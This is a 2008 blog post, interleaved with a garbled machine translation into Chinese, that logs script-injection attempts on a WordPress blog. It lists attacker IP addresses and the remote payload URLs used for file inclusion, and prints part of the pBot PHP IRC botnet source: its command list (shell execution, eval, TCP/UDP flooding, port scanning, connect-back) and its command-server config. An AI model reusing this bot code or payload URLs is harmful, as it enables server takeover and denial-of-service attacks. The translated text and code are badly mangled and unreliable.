Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008 每日黑客Attemps上blog.kakkoi.net -0 8年二月六日

    • Feb 二月
    • 06 06

    Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008 每日黑客Attemps上blog.kakkoi.net -0 8年二月六日

    Posted by Noah Ark 8 months ago . 发布者诺亚 方舟 8月前

    Filed under Security ¸ script injection & vulnerability .根据提交的安全 脚本注入 脆弱性。

    黑客企图 Today’s we just upgrade from WordPress 2.3.2 to 2.3.3 security release .今天的我们只是升级到WordPress的2.3.2至 2.3.3 安全获释。 There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts ↓.有21个攻击(脚本注射)就从3 blog.kakkoi.net称为僵尸牧人脚本↓ 。 The first attacker is from 212.24.62.200 → udkado.ru masking their useragent as Googlebot (a real human?).第一次攻击是从212.24.62.200 → udkado.ru掩盖其用户代理作为Googlebot会 (一个真正的人吗? ) 。 The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/.玩的人跟我302.curie重定向页blog.kakkoi.net /开放/ 。 I send the attacker data to abuse network and IronPort.我传送数据的黑客滥用网络和IronPort 。

    The next few hours we received 20 attack from the same bot-herder.在接下来的几个小时,我们收到了20个攻击来自同一个僵尸牧人。 They probably has a large scale of DDNS (china → korea → us ).他们大概有一个大型的动态域名服务 (中国→韩国→我们) 。 Noticeably the scans pattern is predictable.值得注意的扫描模式是可以预测的。 From our Feb 5th attack all these botnet is targeting certain search keywords security, injection so we setup a honey-pot right on that particular URL.从我们2月5日袭击所有这些僵尸是针对某些搜索关键字安全,注射液 ,所以我们设置一个蜂蜜罐上的特定网址。

    Hacking Attempts on Kakkoi黑客企图Kakkoi

    Sort by Injection type.按注射液的类型。

    IP / DDNS的IP /动态域名服务 UA 心绞痛 ATT 属性 Country国家 Params参数
    212.24.62.200 212.24.62.200 Googlebot Googlebot会 1 Russia 俄罗斯
    61.152.158.46 61.152.158.46 N/A ñ /阿 4 China 中国
    • http://basiclifesaving.org/mycomments/rom.txt http://basiclifesaving.org/mycomments/rom.txt
    • http://www.freewebtown.com/acc827/test.txt http://www.freewebtown.com/acc827/test.txt
    • Request URI: /security/injection/ 请求 / 安全/注射液/
    1. 85.88.3.47 85.88.3.47
    2. 74.205.123.49 74.205.123.49
    3. 210.205.6.161 210.205.6.161
    4. 207.44.246.45 207.44.246.45
    		N/A ñ /阿 16 16日
    1. Germany 德国
    2. US 美国
    3. Korea 韩国
    4. US 美国
    • http://basiclifesaving.org/mycomments/rom.txt http://basiclifesaving.org/mycomments/rom.txt
    • http://www.freewebtown.com/acc827/test.txt http://www.freewebtown.com/acc827/test.txt
    • Request URI: /security/injection/ 请求 / 安全/注射液/

    The Bot-herder Host以BOT ,牧民主机

    Part of class pBot source taken from http://basiclifesaving.org/mycomments/rom.txt部分类pBot来源取自http://basiclifesaving.org/mycomments/rom.txt 

     <? “ ?  

 /* / * 
  * 
  * #crew@corp. * # @公司船员。 since 2003自2003年以来, 
  * edited by: devil__ <admin@xdevil.org> *编辑: devil__ <admin@xdevil.org> 
  * 
  * COMMANDS: *命令: 
  * 
  * .user <password> //login to the bot * 。使用者<password> / /登录到僵尸 
  * .logout //logout of the bot * 。登出/ /注销傀儡 
  * .die //kill the bot * 。模/ /杀死僵尸 
  * .restart //restart the bot * 。重新启动/ /重新启动机器人 
  * .mail <to> <from> <subject> <msg> //send an email * 。邮件<to> <from>书<范畴> <msg> / /发送电子邮件 
  * .dns <IP|HOST> //dns lookup * 。域名<IP|HOST> / / DNS查找 
  * .download <URL> <filename> //download a file * 。下载<URL> <文件名> / /下载文件 
  * .exec <cmd> // uses exec() //execute a command * 。主管<cmd> / /利用主管( ) / /执行命令 
  * .sexec <cmd> // uses shell_exec() //execute a command * 。 sexec <cmd> / /使用shell_exec ( ) / /执行命令 
  * .cmd <cmd> // uses popen() //execute a command * 。西咪替丁<cmd> / /使用popen ( ) / /执行命令 
  * .info //get system information * 。信息/ /获取系统信息 
  * .php <php code> // uses eval() //execute php code * 。 PHP的<php code> / /使用评价( ) / /执行PHP代码 
  * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack * 。 tcpflood <target> <packets> <packetsize> <port>其中<delay> / / tcpflood攻击 
  * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack * 。 udpflood <target> <packets> <packetsize> <delay> / / udpflood攻击 
  * .raw <cmd> //raw IRC command * 。原料<cmd> / /原材料体育馆命令 
  * .rndnick //change nickname * 。 rndnick / /更改昵称 
  * .pscan <host> <port> //port scan * 。 pscan <主机> <port>其中/ /端口扫描 
  * .safe // test safe_mode (dvl) * 。安全/ /测试safe_mode设置( dvl ) 
  * .inbox <to> // test inbox (dvl) * 。收件匣<to> / /测试的收件箱( dvl ) 
  * .conback <ip> <port> // conect back (dvl) * 。 conback <ip> <port>其中/ /连接回( dvl ) 
  * .uname // return shell's uname using a php function (dvl) * 。 uname / /返回shell的uname使用PHP函数( dvl ) 
  * 
  */ * / 

 set_time_limit(0); set_time_limit ( 0 ) ; 
 error_reporting(0); error_reporting ( 0 ) ; 
 echo "Ok unlocker. We did i!";回声“玉unlocker 。我们没有我! ” ; 

 class pBot一流的pBot 
 { 
  var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org",无功配置= $阵列( “服务器” = “ ” Bucharest.ro.eu.ultra - chat.org “ 
  "port"=>"6667", “港口” = “ ” 6667 “ , 
  "pass"=>"n", “通行证” = “的” n “ , 
  "prefix"=>"[R]", “前缀"=>"[ R ] ” , 
  "maxrand"=>"4", “ maxrand ” = “ ” 4 “ , 
  "chan"=>"#unlocker", “海峡"=>"# unlocker ” 
  "chan2"=>"#unlocker", “ chan2 "=>"# unlocker ” 
  "key"=>"n", “钥匙” = “的” n “ , 
  "modes"=>" p", “模式"=>"  p ” , 
  "password"=>"n", “密码” = “的” n “ , 
  "trigger"=>".", “触发"=>".", 
  "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org) “ hostauth ” = “ ” Robert.users.ultra - chat.org “ / / *对任何主机名(记住: / setvhost xdevil.org ) 
  ); ) ;

    Related Posts有关职位

    External Links外部链接

    About the Author作者简介

     

    Tags: 标签:
    • February 6, 2008 at 10:59 pm 2008年二月六日在下午10时59分
    • February 7, 2008 at 6:44 pm 2008年2月七日在下午6点44
    • 0.3
    • url网址

    • No Responses toDaily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008 没有响应 每日黑客Attemps上blog.kakkoi.net -2 008年2月六日”

      Trackback URL: 引用网址: Use the TrackBack url ↑ to ping this article. 使用引用网址↑以平本条。 If your blog does not support Trackbacks you might want to leave a comment instead. 如果您的博客不支持搬场您可能想要发表评论代替。
        • RE: Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008 - 'The Guide' ↓ 稀土:每日黑客Attemps上blog.kakkoi.net -2 008年二月六日- '指南'↓
          Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008 Kakkoi 8 months ago 5 url 每日黑客Attemps上blog.kakkoi.net -0 8年二月六日K akkoi8 个月前的第 5网
          马文视点枪

          The following "Code" are designed to protect you and other users of this site. 下面的“守则”旨在保护您和其他用户的这个网站。

          • Be relevant: Your comment should be a thoughtful contribution to the subject of the entry. 相关:您的评论应该是一个深思熟虑的贡献的主题项目。 Keep your comments constructive and polite.让您的建设性意见和礼貌。
          • No advertising or spamming: Do not use the comment feature to promote commercial entities/products, affiliates services or websites. 没有广告或垃圾邮件:不要使用评论功能,以促进商业实体/产品,公司服务或网站。 You are allowed to post a link as long as it's relevant to the entry.您可以张贴一个链接,只要它的相关条目。
          • Keep within the law: Do not link to offensive or illegal content websites. 请在法律范围内:不要链接到攻击性或非法内容的网站。 Do not make any defamatory or disparaging comments which might damage the reputation of a person or organisation.不要让任何诽谤或诋毁评论可能损害声誉的人或组织。
          • Privacy: Do not post any personal information relating to yourself or anyone else - (ie: address, place of employment, telephone or mobile number or email address). 隐私:请勿张贴任何个人信息与自己或别人-(即:地址,就业地点,电话或手机号码或电子邮件地址) 。

          In order to keep these experiences enjoyable and interesting for all of our users, we ask that you follow the above guidlines.为了使这些经验,愉快的和令人感兴趣的所有的用户,我们请您按照上述guidlines 。

          be the first to comment.首先评论。

          Kakkoi Feel free to engage, ask questions, and tell us what you are thinking! 随时进行,询问问题,并告诉我们您的想法! Regular and insightful comments are most welcomed. 经常和有见地的评论是最值得欢迎的。

    "write as if you were talking to a good friend (in front of your mother)." “写的,如果你跟一个好朋友(前面的你的母亲) 。 ”

    .have your say

    Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved. 声明:对于任何内容,您后,您在此授予Kakkoi的免版税的,不可撤销的,永久性,排他性和充分转授的许可使用,复制,修改,改编,出版,翻译,创造衍生作品,分发,执行和显示这些内容的全部或部分,全世界范围内,并把它在其他作品,以任何形式,媒体或技术现在已知或以后开发。 一些版权所有。

MySQL query error MySQL查询错误